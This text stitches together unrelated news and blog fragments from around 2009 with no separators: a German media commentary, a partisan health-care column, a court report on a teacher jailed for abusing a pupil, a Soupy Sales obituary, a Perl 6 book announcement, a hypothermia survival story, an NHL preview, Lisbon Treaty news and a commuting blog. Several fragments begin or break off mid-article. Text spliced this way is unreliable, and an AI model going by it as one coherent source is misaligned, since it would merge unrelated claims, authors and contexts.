Even though you only use one account for home sharing , you should be able to share songs purchased with either account , as long as both computers are authorised to play them .
Unschuldige bezahlen Peter Mühlbauer
Die Süddeutsche Zeitung entlässt angeblich Mitarbeiter .
Wirtschaftsredakteur Marc Beise ist wahrscheinlich nicht dabei
Anfang der
Woche wurde bekannt , dass es bei der Süddeutsche Zeitung in Folge der Finanz - und Wirtschaftskrise betriebsbedingte Entlassungen geben soll .
Hintergrund ist , dass das Blatt 2009 zum ersten Mal in seiner Geschichte rote Zahlen schreiben dürfte .
Nach Informationen der Berliner Zeitung rechnet man angeblich mit bis zu 10 Millionen .
Am Dienstag tagte der Herausgeberrat über Konsequenzen , bis Freitag sind die Mitarbeiter aufgerufen , " Sparvorschläge " zu machen und am Wochenende sollen die Führungskräfte in einer Klausursitzung am Starnberger See zusammenkommen .
Bis zum 27 .
Oktober will man dann Entscheidungen treffen und diese auf einer Betriebsversammlung bekannt geben .
Bereits im letzten Jahr hatten sich die Süddeutsche Zeitung und ihr Verlag über Abfindungen von mehr als 70 Mitarbeitern getrennt .
Schon relativ sicher scheint allerdings nach Informationen aus Unternehmenskreisen , dass ein Mitarbeiter nicht von der Entlassungswelle betroffen sein wird - obwohl er wie kein anderer1 zur Entstehung der Finanzkrise beitrug , die nun zu den Verlusten führt : Marc Beise - ein vorher bei der Offenbach - Post und beim Handelsblatt beschäftigter Fernsehtalkshowgast , der bei der SZ vom Oktober 1999 an das Ressort Wirtschaft leitete .
Mit Schwadronaden wie " Schröder hatte recht " und Büchern wie " Deutschland - falsch regiert " kritisierte Beise das " Elend der kleinen Schritte " , schwärmte davon , " was der Markt kann " und lobte Friedrich Merz und Bernd Raffelhüschen .
" Die Entlohnung " , so Beise 2006 in Verteidigung der bereits vor der Finanzkrise in die Kritik gekommenen Managerbezüge , " erfolgt in der Marktwirtschaft aus guten Gründen nicht nach Gerechtigkeitskriterien " .
Welche " guten Gründe " das sein sollen , ließ er allerdings offen .
Damals benutzte der Wirtschaftsjournalist " Regulierung " wie ein Schimpfwort .
Und auf die seinen Angaben nach " schwierige " Frage , was der Staat denn überhaupt für Aufgaben hat , fiel ihm nur ein , dass er Millionäre mit " großen Reformen [...] beeindrucken " solle , damit sie anschließend investieren .
Die einzig vernünftige staatliche Regelsetzung war für ihn die Schaffung von " Rahmenbedingungen " für eine " Entlastung der Unternehmen " .
Im November 2008 , als die Weltwirtschaftskrise nicht mehr zu übersehen war , versuchte Beise einen Kunstgriff :
Er nahm eine historische Bedeutung des Wortes " Neoliberalismus " und berief sich darauf , dass man ihn und Andere ganz furchtbar missverstanden hätte .
Definiert man allerdings " Neoliberalismus " in diesem älteren , ursprünglichen Sinne , dann würden zwei ganz sicher nicht dazugehören : Gerhard Schröder und Marc Beise .
Gerade Schröder entmachtete das Kartellamt , die Kerninstanz dieses historischen Neoliberalismus , wie kein zweiter vor ihm .
Die Finanzmärkte deregulierte er nicht nur , sondern er ließ sie ( was sich als noch wesentlich schädlicher erwies ) ihre eigenen Regeln aufstellen .
Gleiches gilt für die Art und Weise , in der natürliche Monopole seit den 1990er Jahren reihenweise privatisiert wurden .
Die Väter des historischen Neoliberalismus , Wilhelm Röpke und Alexander Rüstow , hätten hier scharf opponiert .
Doch Beise klatschte Beifall .
Rüstow - in der Mont - Pèllerin - Socitey großer Gegenspieler Friedrich von Hayeks2 - entwickelte bereits in den 1930er Jahren seine " Theorie der subtheologischen Befangenheit " .
In seiner Schrift " Das Versagen des Wirtschaftsliberalismus als religionsgeschichtliches Problem " stellt er fest , dass die Deisten des 18 .
Jahrhunderts den Wettbewerb als ein Instrument der Vorsehung ansahen , der als automatischer Ersatz für die " Ehrlichkeit " dienen sollte - doch bereits nach kurzer Zeit wurde die Ableitung des Wettbewerbs aus der Vorsehung vergessen und der Wettbewerb selber an die Stelle Gottes gesetzt .
3 Der " Aberglaube " an die unbedingte Gültigkeit bestehender ökonomischer Gesetze verhinderte nach Rüstow notwendige Eingriffe zur Sicherstellung der Funktionstüchtigkeit der Marktwirtschaft und führte zur Degeneration des Kapitalismus :
Und so wurden denn jene Einschränkungen and Vorbehalte , die wir bei Smith selber noch finden , von seinen fortschrittsfreudigen Adepten bald vollends überhört and vergessen .
In durchaus unangebrachtem Gottvertrauen versäumte man völlig , das Kamel anzubinden .
Wie hypnotisiert ließ man auch die schlimmsten Dinge geschehen , ohne sich auch nur zur geringsten Reaktion aufraffen zu können .
Man hatte Gott walten lassen wollen , and gab schließlich dem Teufel freie Hand , dem Teufel des Strebens nach Bereicherung auf Kosten Anderer , der Machtgier and der Herrschsucht .
Der Nationalökonom zitierte Adam Smith mit der Bemerkung , dass , wenn sich zwei Unternehmer treffen , dies selten aus einem anderen Grund als den geschieht , Preisabsprachen zu treffen .
In der Tendenz zu Monopolen sah Rüstow eines der größten Probleme der Marktwirtschaft und plädierte für Verhütung statt Kontrolle , weil die Wettbewerbsbehörden leicht zum Werkzeug wirtschaftlicher Interessen werden , wenn bereits ein Monopol , Oligopol oder Kartell vorliegt .
4
Liest man Rüstow , dann wird nicht nur klar , dass die seit den 1970er Jahren weltweit durchgesetzten Modelle , die unter dem Schlagwort " Neoliberalismus " verkauft wurden , nach dem Maßstab des Wiesbadeners bestenfalls ein " Paläoliberalismus " ( häufiger jedoch ein Neofeudalismus ) waren , sondern auch , warum sie ihre Versprechungen nicht einhalten konnten .
Wenn also Beise seinen Kritikern vorwirft , sie würden den Begriff " Neoliberalismus " falsch einsetzen , dann müsste er den Ausdruck auch tunlichst für die von ihm vertretene Politik vermeiden .
Und vielleicht ist es gar keine so schlechte Idee , die " machtwirtschaftlichen "
Reformen der letzten dreißig Jahre , bei denen zwar kein Wettbewerb , aber private Monopole geschaffen wurden , und mit denen der Verbraucher heute schlechter dasteht als früher , von nun an nicht mehr als " Neoliberalismus " , sondern als " Beiseismus " zu bezeichnen .
In einem idealen Markt , in dem Allen alle Informationen ohne Verzögerung zur Verfügung stehen , wäre Marc Beise spätestens im September 2008 ins Personalbüro gebeten worden .
" Na , Beise " hätte es dort geheißen , " Sie können es sich ja wahrscheinlich denken ... also , um es kurz zu machen .
Bis morgen ist ihr Schreibtisch leer , dann kommt Werner Rügemer , der übernimmt ihren Posten . "
In der Realität gibt es allerdings keinen idealen Markt .
Dort muss nicht Marc Beise die Verantwortung für das übernehmen , was er über ein Jahrzehnt lang mit großem Eifer predigte , sondern seine Kollegen .
( Peter Mühlbauer )
Instead , young , healthy , childless people will likely opt to pay the $ 1,000 fine ( aka slap on the wrist ) mandated in the bill .
After all , even if they make as little as $ 50,000 a year , the fine is a lot cheaper than 7.5 percent of their income ( or $ 3,500 a year ) !
ADVERTISEMENT
So … these young households will not contribute to the coffers of any health insurance company until they are sick and need the coverage .
By then , their costs will come to vastly more than their premiums .
Who will subsidize the difference ?
We will .
The insurance industry estimates that the bill will drive up premiums for the average family by $ 1,700 a year .
By the time the bill takes effect in 2013 , it estimates that the average annual family health insurance premiums ( now $ 12,300 ) will rise to $ 17,200 if the Obama bill is passed , but only to $ 15,500 if it is defeated .
And who do you think the voters will blame for the hike in their premiums ?
The Democrats who passed the bill .
Supporters of the bill are quick to counter that greater efficiency , etc. , will hold down premiums .
But they have little to answer the argument that , without higher fines , the young and healthy will not consent to pay an arm and a leg for insurance they do n’t need .
Any lingering motivation to pay the premiums will disappear once the Obama bill requires insurance companies to cover them when they do , finally , limp in the door , desperately in need of insurance .
Why pay now when you can always pay later ?
And , with a government subsidy , you gain nothing by paying for all those years when you do n’t need insurance .
So Obama ’s program turns out not to be one to spread insurance and thus spread the risk of costly illness , but one to make people pay 7.5 percent of their incomes once they get sick , with the government picking up their remaining premium and the health insurance customers paying for the medical expenses .
Some deal !
So tote up the cost of this bill on the middle class :
• $ 1,700 more in insurance premiums for the average family
• Medical devices like wheelchairs and hearing aids get taxed
• Those who are sick must pay an average of about $ 600 more a year in income taxes because the bill raises the threshold for deducting medical expenses from 7.5 percent of income to 10 percent
• A $ 404 billion cut in Medicare
• Ending the subsidized Medicare Advantage insurance for costs over and above Medicare .
Without Medicare Advantage , the elderly can only augment Medicare by buying Medigap coverage , for which no subsidy is available and whose premiums are higher ( offered , conveniently enough , by Obama ’s buddies at the AARP )
• No importation of Canadian medicines and no competitive bidding to hold down prescription drug costs ( Obama ’s deal to get Pharma ’s support and advertising dollars )
• A shortage of medical personnel and equipment as 30 million new patients are added without any expansion of the population of doctors and nurses .
This shortage will make rationing inevitable , even if it shortens life expectancies among the elderly .
And all of this assumes that the House bill , which imposes a 4.5 percent payroll tax ( which will discourage new employment ) , does not pass .
...
And that the cost estimates of this program prove realistic .
Despite the Congressional Budget Office ’s concurrence , one can’t help noticing that Massachusetts ’s program was estimated to cost $ 200 million in 2005 and now costs $ 700 million !
This healthcare bill is , indeed , Obama ’s first tax on the middle class .
Morris , a former adviser to Sen. Trent Lott ( R - Miss . ) and President Bill Clinton William ( Bill ) Jefferson ClintonNew poll finds Biden narrowly leading Trump in Georgia Changing the climate of presidential debates Davis :
My advice to Joe Biden on eve of the debate — be Joe Biden MORE , is the author of Outrage and Fleeced .
To get all of his and Eileen McGann ’s columns for free by e-mail or to order a signed copy of their new best - selling book , Catastrophe , go to dickmorris.com .
In August , Morris became a strategist for the League of American Voters , which is running ads opposing the president ’s healthcare reforms .
A private school teacher who admitted having an unlawful relationship with a 15 - year - old pupil has been jailed for 15 months at Southwark Crown Court .
Helen Goddard , 26 , taught music at a prestigious central London school before her arrest in July .
Goddard , of Thornham Street , Greenwich , south - east London , pleaded guilty to six counts of sexual activity with a female child under 16 .
She has also been ordered to sign the sex offenders register .
Goddard , who was known as the " jazz lady " , became close to the youngster as they met over coffee after classes but was " pressured " into the relationship by the pupil , the court was told .
Their relationship became sexual and during their five - month affair the two spent a weekend in Paris , during which they attended the Gay Pride March , and nights at Goddard 's home .
Under the guise of helping her we now understand that for over five months she was betraying our trust and our daughter 's
Statement from girl 's parents
An impact statement from the girl 's parents said the teacher went " out of her way " to befriend them and their " vulnerable " daughter .
" However , under the guise of helping her we now understand that for over five months she was betraying our trust and our daughter 's , " they said .
" She did not stay true to her professional responsibility . "
They felt " particularly betrayed " by the weekend in Paris , and added : " We are deeply upset by the impact on our daughter by Ms Goddard 's actions , which has serious and enduring consequences . "
Sentencing Goddard , Judge Anthony Pitts said : " This is a difficult case .
The evidence showed you were having a full - on sexual relationship with the girl for many months .
" She has made it clear that the sexual contact between you was consensual and she says in her statement that in fact it was instigated by her .
" It is , of course , against the law to engage in sexual activity with a person under 16 , even with her consent . "
' Draconian ' order
He said the " particularly aggravating feature " of the case was that Goddard continued to teach the girl music throughout their affair .
The judge added : " The relationship involved a fair degree of deception not only in respect of the school but also to the girl 's parents . "
The school was made aware of the affair through an anonymous e-mail tip - off , the court heard .
The judge , who was told the girl and the teacher were genuinely in love , did not uphold the prosecution 's request for a sexual offences prevention order as it would be " draconian and unnecessarily cruel " to the girl as well .
Goddard admitted six sample counts of sexual activity with the girl between February and July this year .
Goddard , a child prodigy , was one of five young musicians from England invited to play at the Sydney Olympics opening ceremony in 2000 .
Anthony Heaton - Armstrong , defending , said Goddard was " very remorseful " and stressed she was " not in any sense a sexual predator " .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Clad in a top hat , sweater and bow tie , shuffling through his Mouse dance , he reached his slapstick heyday in the mid-1960s on “ The Soupy Sales Show , ” a widely syndicated program based at WNEW - TV in New York .
Image Soupy Sales rehearsing for his Broadway debut in " Come Live With Me " in 1966 .
Credit ...
Associated Press
Some 20,000 pies were hurled at Soupy Sales or at visitors to his TV shows in the 1950s and ’60s , by his own count .
The victims included Frank Sinatra , Tony Curtis and Jerry Lewis , all of whom turned up just for the honor of being creamed .
His memoir “ Soupy Sez ! ” ( M. Evans , 2001 ) , written with Charles Salzberg , supplied the precise ingredients for successful pie-throwing : “ You can use whipped cream , egg whites or shaving cream , but shaving cream is much better because it does n’t spoil .
And no tin plates .
The secret is you just ca n’t push it and shove it in somebody ’s face .
It has to be done with a pie that has a lot of crust so that it breaks up into a thousand pieces when it hits you . ”
But the key to his comedy went beyond the smashing of a pie .
“ Our shows were not actually written , but they were precisely thought out , ” he explained in his memoir .
“ But the greatest thing about the show , and I think the reason for its success , was that it seemed undisciplined .
The more you can make a performance seem spontaneous , the better an entertainer you are . ”
For all the staged mayhem , the truly unpredictable did occur .
“ I remember one time we were working with Pookie at the window , ” Mr. Sales recalled .
“ He was doing a bit where he was breaking eggs and one of the eggs turned out to be rotten .
My God , the smell was terrible !
And I ’m sure , watching us at home , everyone knew there was something wrong from the look on our faces . ”
We want a Perl 6 book .
We want it badly enough to write it ourselves .
So that 's what we 're doing : writing one .
We , that is Patrick Michaud ( architect of the Rakudo Perl compiler ) , Jonathan Worthington ( prolific contributor to both Rakudo and Parrot ) , Carl Mäsak ( frenetic Rakudo user , and our number one bug finder ) and Moritz Lenz ( keeper of the Perl 6 test suite , and Perl 6 user and blogger ) .
We are also open to contribution from others - already Jonathan Scott Duff has written an initial preface for us .
We do n't have a name yet for our book .
We want to cover the basics of Perl 6 , enough to get your feet wet , and enough to make you want to use it .
We want it to be based on useful examples .
It is not going to be the definitive book , that task we leave to Larry Wall and Damian Conway .
Our vision is to present primarily the subset of Perl 6 that Rakudo understands , and have printed copies available by the time Rakudo Star is released , that is April or May 2010 .
chromatic and Allison Randal have kindly offered to published it via Onyx Neon Press .
Until then , monthly releases will be published under a Creative Commons license ( noncommercial , attribution , share - alike ) .
Currently we have four chapters under construction , and the intention of writing the more introductory chapters later , when we know what we need to introduce for the later chapters .
So far we have
Multi dispatch
Classes and Object
Regexes
Grammars
You can download the preliminary PDF version of the book here .
Two pieces worth reading on health care innovation .
First , Glenn Reynolds on his family :
President Obama talks about the importance of prevention in a way that suggests that when people have heart attacks it 's their own fault .
But my wife , a longtime vegetarian and marathon runner , had a freak heart attack at the age of 37 .
It was n't from too many Big Macs .
After some rough patches , she 's now doing well , thanks to an obscure and expensive anti-arrhythmic drug called Tikosyn , and an implantable cardioverter / defibrillator .
Not too long ago , she 'd have been largely bedridden .
These medical innovations made the difference between the life of a near - invalid and a life that 's close to normal .
My mother had a hip replacement .
Her hip did n't break - she basically wore it out with exercise .
When the pain got too bad , she got it replaced , and now she 's moving around like before , only painlessly .
Not too long ago , she would have been chairbound .
My father had prostate cancer ; his doctor suggested waiting but on biopsy it turned out to be pretty aggressive .
It was treated with radioactive " seed " implants .
He 's now been cancer - free for several years , without the side effects of earlier treatments -- or , worse , of cancer .
My daughter had endoscopic sinus surgery this spring .
She had been sickly and listless , complaining of constant migraine headaches , missing a lot of school , and generally looking more like a zombie than a teenager .
Several doctors dismissed her problems , or prescribed antibiotics that did n't help much , until we found one who took the extra step .
A head CT scan done on a fancy new in - office machine showed a nasty festering infection , the surgeon cleaned it out , and now she 's like a normal kid again .
Before laparoscopy , her condition
would probably have remained untreated , and she would have been another " sickly " kid .
Better to be well .
The normal critique of socialized medicine is to point out that people have to wait a long time for these kinds of treatments in places like Britain .
And that 's certainly a valid critique .
I 'm sure my mom and daughter would still be waiting for their treatments , while my father and wife would probably be dead .
The key point , though , is that these treatments did n't just come out out of the blue .
They were developed by drug companies and device makers who thought they had a good market for things that would make people feel better .
OBAMA ’S SPEECH TO GET GOP RESPONSE ….
President Obama will deliver an address on health care to a joint session of Congress on Wednesday .
Given the attention , congressional Republicans requested that networks also air a GOP response , noting that this is what happened in 1993 , following a similar address from then - President Bill Clinton .
Yesterday , ABC , CBS , NBC , and CNN agreed to air both , though it ’s unclear who ’ll speak on the Republicans ’ behalf .
It ’s even less clear what the GOP response will say .
After all , there is no official Republican alternative to Democratic reform plans .
On July 23 , House Minority Leader John Boehner ( R - Ohio ) said GOP lawmakers were putting “ the final touches ” on the Republican bill .
That was 44 days ago , and the party is n’t even pretending to still care .
Any chance the GOP will use this week ’s rebuttal to unveil a plan ?
I kind of doubt it .
On a related note , every major network will air the president ’s speech — except one .
Care to guess ?
While ABC , NBC and ABC confirmed today they ’ll air Obama ’s address to Congress , Fox has just announced in a statement that the network wo n’t preempt programming on Wednesday , according to a company statement .
It ’s not too surprising considering Fox aired “ So You Think You Can Dance ” instead of Obama ’s last prime - time news conference .
The reality dance contest also airs at 8 pm on Wednesday , the same time Obama addresses Congress .
Actually , I think it is “ surprising . ”
It ’s one thing to skip a press conference ; it ’s another to skip a speech to a joint session of Congress in the midst of one of the biggest policy debates of this generation .
Eric Boehlert asks , “ Did Fox TV ever refuse to air one of president Bush ’s joint - session speeches ?
Indeed , has any U.S. TV network ever refused to air presidential speech before Congress ? ”
That last question is of particular interest .
I ca n’t find any examples of a major national broadcast network — ABC , CBS , NBC , Fox — refusing to air a presidential address to a joint session of Congress .
Does anyone know if this is a first for the television era ?
NARVIK , Norway ( CNN ) --
Fresh from medical school , Anna Bågenholm chose to do her residency in the Norwegian city of Narvik because of its spectacular mountain slopes .
An expert skier , Bågenholm had gone off the trail with two other young doctors on a warm spring afternoon when she fell .
Rescuers worked frantically to save Anna Bagenholm from a hole in the ice of a mountain stream .
What happened that day in 1999 changed her life and has redefined what is possible in cases of accidental hypothermia .
Bågenholm slid down a steep , icy gully and ended up submerged head first in a hole in the ice in a mostly frozen stream .
Only her skis and Telemark boots and bindings protruded from the thick , opaque ice .
As the 29 - year - old struggled , her friends Marie Falkenberg and Torvind Næsheim began a frantic effort to free her , made impossible by a torrent of frigid spring runoff pouring over them into the hole where their friend was submerged .
They called for help , starting a chain of events that is now part of medical literature and local lore .
Bård Mikkalsen , a police lieutenant in Narvik at the time , took the call .
" I realized this was really a serious case , " said Mikkalsen , who has since retired .
He scrambled a pair of rescue teams in Narvik , one from the top of the mountain , the other from the bottom .
He also contacted the nearest rescue team in Bodø , nearly 200 miles away , but the Sea King helicopter had already left to transport a sick child .
Watch more of Anna Bågenholm 's story »
" I told the operator , ' You must send the helicopter to here , and you have only one minute to decide it .
You have to call me back .
The time is running out . ' "
The dispatcher turned the helicopter around .
Heading the rescue party from the top of the mountain , Ketil Singstad skied as fast as he could in the wet springtime snow to the spot where Bågenholm remained trapped under the ice .
Singstad said he and others tied a rope to her feet and tried unsuccessfully to pull her free , and the snow shovel and small saw they had brought were no match for the thick ice .
Then he saw another rescuer heading up the mountain with a pointed gardening shovel .
' Cheating Death ' Hear about the medical miracles that are saving lives in the face of death , taken from Dr. Sanjay Gupta 's new book " Cheating Death . " 8 and 11 p.m. ET Saturday - Sunday on CNN .
see full schedule »
Using that tool , rescuers cut a hole downhill from Bågenholm and pulled her through the opening .
She had been under the ice for about 80 minutes .
" I thought we were taking a friend , dead , out of the water , " Singstad recalled .
Bågenholm 's ski companions , both doctors , began CPR and continued until the rescue helicopter arrived .
The emergency crew winched Bågenholm up to the hovering chopper , giving her CPR and squeezing air into her sodden lungs as they made the hourlong flight to the University Hospital of North Norway in Tromsø .
Dr. Mads Gilbert , head of emergency medicine at the hospital , was waiting on the helipad .
" She has completely dilated pupils .
She is ashen , flaxen white .
She 's wet .
She 's ice cold when I touch her skin , and she looks absolutely dead , " Gilbert said .
" On the ECG [ electrocardiogram ] , which the doctor on the helicopter has connected her to , there is a completely flat line .
Like you could have drawn it with a ruler .
No signs of life whatsoever .
And the decision was made .
We will not declare her dead until she is warm and dead . "
Gilbert and the waiting team at the hospital were hoping the CPR that Bågenholm received after being pulled from the stream had provided enough oxygen to her chilled brain .
When it 's cold , the brain needs far less oxygen than it does at normal temperature , 98.6 degrees ( 37 Celsius ) , and Bågenholm was definitely cold .
Her body temperature was just 56 degrees Fahrenheit ( 13.7 degrees Celsius ) .
No one had ever been that cold for that long and survived .
Rushed to Operating Room 11 at the hospital , surgeons rerouted Bågenholm 's blood through a heart - lung machine and slowly warmed it .
More than three hours after her heart stopped , Gilbert recalled watching the video probe of Bågenholm 's heart .
Health Library MayoClinic.com : Hypothermia
" It was standing completely still .
No movement .
I just saw some little shivering .
No fibrillation .
And suddenly it contracted .
Pssh , " Gilbert said , squeezing his fists to mimic a beating heart .
" And there was a pause and pssh .
A second contraction . "
Gilbert tears up at the memory .
Bågenholm was alive , but months of recovery lay ahead .
Paralyzed for almost a year until her damaged nerves healed , Bågenholm today is a radiologist at the hospital where she was saved .
She has returned to skiing and other sports .
She and Næsheim began dating in the years since the accident and now live together .
Have you cheated death ?
Tweet your medical miracle and win a copy of " Cheating Death " by Dr. Sanjay Gupta
Bågenholm remembers nothing of the accident and adds that the event did not change her life .
" I 'm not so emotional .
I 'm more practical , I think , " she says .
Her case history made the prestigious British medical journal , The Lancet , and stands as a challenge to doctors confronted with victims of severe hypothermia .
Næsheim , who is an anesthesiologist at the University Hospital of North Norway and is on the helicopter emergency medical team there , says the lesson from Bågenholm 's case is clear .
" It 's the three important things about emergency medicine , which is never give up , never give up , never give up .
Because there 's always hope . "
The shovel that broke through the ice remains on the mountainside in Narvik , hanging from a tree next to the stream as a testament to the possible .
All About Emergency Medicine • Skiing • Norway
Chicago may not be at full strength when the Nashville Predators come to town ( 8:30 p.m. ET ) .
Captain Jonathan
Toews left Wednesday 's game after a thunderous third - period hit by Vancouver 's Willie Mitchell and did n't practice Thursday or Friday .
The Predators come to the United Center off a wild 6 - 5 overtime win at Ottawa that snapped a six - game losing streak .
Fifteen games … 30 teams … 600 players … 60 officials … 250,000 - plus fans .
Just another Saturday night in the National Hockey League ?
Well , not quite .
For the second time this season and just the fourth time in history , the NHL will have all 30 teams in action on Saturday .
Unlike Oct. 3 , the previous instance this season in which every team played , there are no games in Europe and none scheduled for the afternoon -- just 15 games scheduled to begin in a three - hour span , beginning a little after 7 p.m. ET .
Perhaps the team most eager to get back onto the ice is the Toronto Maple Leafs , who 've been sitting at home all week after a 4 - 1 home loss to the New York Rangers last Saturday dropped them to 0 - 6 - 1 , matching the worst start in franchise history .
The Leafs have spent a week looking at that goose egg in the win column , so expect them to be revved up when they step onto the ice at G.M.
Place for a rare visit to Vancouver ( 7 p.m. ET , CBC , NHL Network - U.S. ) .
Toronto GM
Brian Burke and his assistant , Dave Nonis , both used to run the Canucks and will be making their first visit to G.M.
Place in charge of the Leafs .
The Canucks are coming off their first road win of the season , a 3 - 2 victory at Chicago on Wednesday .
They 're 3 - 1 - 0 at home this season and have won their last four meetings with the Leafs .
Toronto has n't won at G.M.
Place since a 5 - 3 victory on Nov. 22 , 2003 -- nearly six years ago .
Five other games also get under way at 7 .
Montreal tries to make it three consecutive victories when the New York Rangers come to town ( CBC , RDS ) .
The Canadiens are coming off their best performance of the season , a 5 - 1 victory over the New York Islanders , while the Rangers have lost their last two -- both at home -- after reeling off seven wins in a row .
Boston visits Ottawa in a battle of Northeast Division rivals .
The Bruins won five of six meetings with the Senators last season while rolling to the division title ; this season , they 're only 4 - 4 - 1 and have yet to win two in a row .
Ottawa is 5 - 2 - 1 , a far better start than last season when the Senators missed the playoffs for the first time since 1996 .
Alex Ovechkin rarely had much success against the New York Islanders until last season , when he scored six times in four games -- including a pair of overtime winners at the Nassau Coliseum .
Ovi and the Washington Capitals will try to spoil the night for fans on Long Island once again while getting their first look at Isles rookie John Tavares , who has seven points in his first eight NHL games .
San Jose continues a six - game road trip with a visit to Atlanta .
The Sharks are 2 - 2 - 0 on their trip but are coming off a 5 - 2 loss at Tampa Bay on Thursday .
The Thrashers are 4 - 2 - 1 after seven games , largely thanks to captain Ilya Kovalchuk , who scored his eighth and ninth goals in a 5 - 4 home loss to Washington on Thursday .
The Florida Panthers will try to bounce back from a disappointing 3 - 2 shootout loss at Pittsburgh on Friday night they visit Philadelphia .
The Panthers , who beat the Flyers 4 - 2 in Florida eight days ago , led Pittsburgh 2 - 0 in the third period before Sidney Crosby scored twice in regulation and once in the shootout .
Philadelphia beat Boston 4 - 3 in a shootout on Thursday , the Flyers ' first game since the loss at Florida .
The Penguins go for their eighth win in a row and 10th in 11 games when they host the New Jersey Devils at 7:30 p.m. ET .
Marc - Andre Fleury figures to be back in the net for the Penguins after Brent Johnson beat the Panthers for his first win .
The Devils are a perfect 4 - 0 - 0 on the road after a 4 - 2 win over the Rangers in New York on Thursday .
Also at 7:30 , the Buffalo Sabres will try to complete a two - game sweep of their trip to Florida when they visit the Tampa Bay Lightning .
Buffalo scored five times in the first period and rolled to a 5 - 2 victory over the Panthers on Wednesday .
The Sabres have won seven of their last eight visits to the St. Pete Times Forum and are 21 - 7 with three ties at Tampa Bay since the Lightning entered the NHL in 1992 .
The St. Louis Blues try to make it two home wins in as many nights when they host Dallas ( 8 p.m. ET ) .
The Blues beat Minnesota 3 - 1 on Friday for their first win of the season at the Scottrade Center .
Dallas is coming off a 1 - 0 - 1 trip to Southern California , though the Stars lost 5 - 4 in overtime at Los Angeles on Thursday .
The Wild went home after the loss to St. Louis and will host the struggling Carolina Hurricanes ( 8 p.m. ET ) .
Minnesota is 2 - 7 - 0 , with two wins at home and seven losses on the road .
Carolina , which lost 5 - 4 at Colorado on Friday to fall to 2 - 5 - 2 , is trying to avoid an 0 - for - 4 road trip .
Colorado stayed home after Friday 's win and will host the Detroit Red Wings on Saturday .
It 's a rematch of their game in Detroit last Saturday -- a game in which the Avs rallied from 2 - 0 and 3 - 2 deficits in the third period to beat the Wings 4 - 3 in a shootout .
Colorado is 7 - 1 - 2 and has won all three of its games at the Pepsi Center , while Detroit has yet to win on the road .
The top two teams in the Pacific Division get together in Glendale , Ariz. , where the surprising Phoenix Coyotes host the almost - as - surprising Los Angeles Kings ( 9 p.m. ET ) .
The Coyotes have won six of their first eight games for the first time since 2000 - 01 and are coming off an emotional 3 - 2 overtime win at home over Detroit .
The Kings are 6 - 4 - 0 after Thursday 's 5 - 4 OT win at home over Dallas , but one of those losses came three weeks earlier when the Coyotes won 6 - 3 to spoil L.A. 's home opener .
The Oilers and Flames , who played at Edmonton three weeks ago on this season 's first 15 - game night , go at it again ( 10 p.m. ET , CBC ) , though they 'll face off this time at the Pengrowth Saddledome .
The Flames have won the first two editions of this season 's Battle of Alberta , and Calgary stunned the Oilers and their fans on Oct. 3 with a last - minute goal for a 4 - 3 victory at Rexall Place .
Both the Flames and Oilers are coming off home wins over Columbus , and the Blue Jackets are undoubtedly happy to have left Western Canada for Southern California , where they 'll visit the Anaheim Ducks ( 10 p.m. ET ) .
The Jackets allowed six goals in each game in Alberta and will try to tighten up against the Ducks , who 've struggled to score and are coming off a 4 - 2 home loss to Dallas .
President Klaus ' opt - out demand was unexpected Czech President Vaclav Klaus is satisfied an EU proposal meets demands he made for an opt - out on the bloc 's Lisbon Treaty , his office says .
Mr Klaus wanted an opt - out from the Charter of Fundamental Rights which covers EU citizens ' rights .
He was concerned the charter could allow property claims by Germans expelled from Czechoslovakia after World War II to circumvent courts .
The Czech Constitutional Court is also reviewing a challenge to the treaty .
It is aimed at streamlining the 27 - member EU 's decision making .
LISBON TREATY
Creates new post of EU president ( President of European Council ) New post of High Representative for Foreign Affairs
More decisions by majority vote , rather than unanimity Ratified by all member states except Czech Republic Only Ireland held referendum on it - twice ( ' Yes ' vote second time )
Took a decade of negotiations
Was intended to take effect in January 2009
The treaty incorporates the Charter of Fundamental Rights , which covers a wide range of EU citizens ' rights and will become legally binding once Lisbon enters into force .
That cannot happen unless all 27 member states ratify the treaty .
The Czech parliament has already approved the treaty , but Mr Klaus is the only EU leader yet to sign it .
His opt - out demand , made on 9 October , was unexpected and raised concerns about yet further delays to the treaty .
However , his office said on Friday : " The president ... received the Swedish presidency 's proposal which is a response to his request related to the Lisbon Treaty ratification in the Czech Republic .
" This proposal corresponds to what the president has envisioned and it is possible to work with it further . "
Details of the proposal were not released .
Mr Klaus has previously said he will not sign the treaty until the Czech Constitutional Court rules on a new legal complaint against it , lodged by senators allied to him .
A court hearing is due next week .
Poland was the last country to fully ratify the treaty on 10 October , when President Lech Kaczynski finally signed it in a ceremony .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
New here ?
You may want updates via email or RSS feed .
Thanks for visiting !
I 've always been a car guy .
It 's not that I 'm mechanically inclined or that I get into the latest makes and models — neither of these is anywhere close to the truth — but that a car has always been my primary mode of transportation .
When I was a boy , my family lived in rural Oregon , six miles from the nearest town .
Automobiles were our only real option for getting around .
Even when I went away to college , I relied on a car for most of my mobility .
And so it 's been for forty years .
As I say , I 've always been a car guy .
This summer , though , I 've had a sort of epiphany , one prompted by your comments and suggestions .
I 've learned that I can save money and improve my fitness by leaving my car at home — by exploring alternate modes of transportation .
The Bus
After my small adventure riding the bus in April , I 've begun to view it as a valid means for getting around town .
I think it helps that our friends Chris and Jolie are huge bus advocates , and use it to travel to and from our house .
If they can use the bus , so can I — right ?
Now , instead of seeing the bus as something other people use , I know it 's something that I can use as well .
For example , I 'm hoping to take a French class at a local college when the fall term starts .
( Kris and I are teaching ourselves French in preparation for our planned vacation to Paris next autumn . )
If I do this , I intend to take the bus to school three mornings a week .
I still do n't use the bus often , but it 's now in my pool of options , especially if I do n't want to hassle with a car .
Portland 's transit system has an awesome website , so it 's easy to find a route that works for me .
The Bike
I love cycling , but I rarely hop on a bike anymore .
For a couple of years during the late 1990s , I regularly rode my bike 5.8 miles to - and - from the box factory during the summer .
I was biking over 1000 miles a year .
I 've biked occasionally here at our new house , but I 'm older and fatter than I used to be , and my bike no longer really fits me .
I spent the better part of this summer avoiding a bike purchase — I just bought a car , for goodness sake — but two weeks ago , I finally realized that I was being foolish .
I bought a city bike , one that actually fits , one that I actually use .
Even though I could afford it , I felt apprehensive spending the money .
( Still have n't shaken all of the old mindsets . )
But after a fortnight using my new vehicle , I 'm pleased with the purchase .
A bicycle is handy not only for exercise , but also for handling middle - distance errands .
If a destination is within 10 - 15 miles and it's not raining ( an important consideration here in Oregon ) , a bike is a viable option .
